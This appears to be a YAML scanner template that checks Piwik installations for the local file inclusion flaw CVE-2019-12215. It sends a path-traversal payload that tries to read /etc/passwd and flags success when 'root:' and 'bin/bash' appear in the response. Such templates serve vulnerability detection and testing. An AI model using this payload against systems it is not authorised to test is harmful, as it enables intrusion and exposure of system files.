id: piwik-lfi
info:
  name: Piwik LFI CVE-2019-12215
  risk: High

params:
  - root: "{{.BaseURL}}"

variables:
  - endpoint: |
      /
      /piwik/

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")

references:
  - link: https://snyk.io/vuln/SNYK-PHP-PIWIKPIWIK-174744
  - repo: https://github.com/matomo-org/matomo/commit/cecec674a65e4dc2a1aa7c33722a5380be2fd719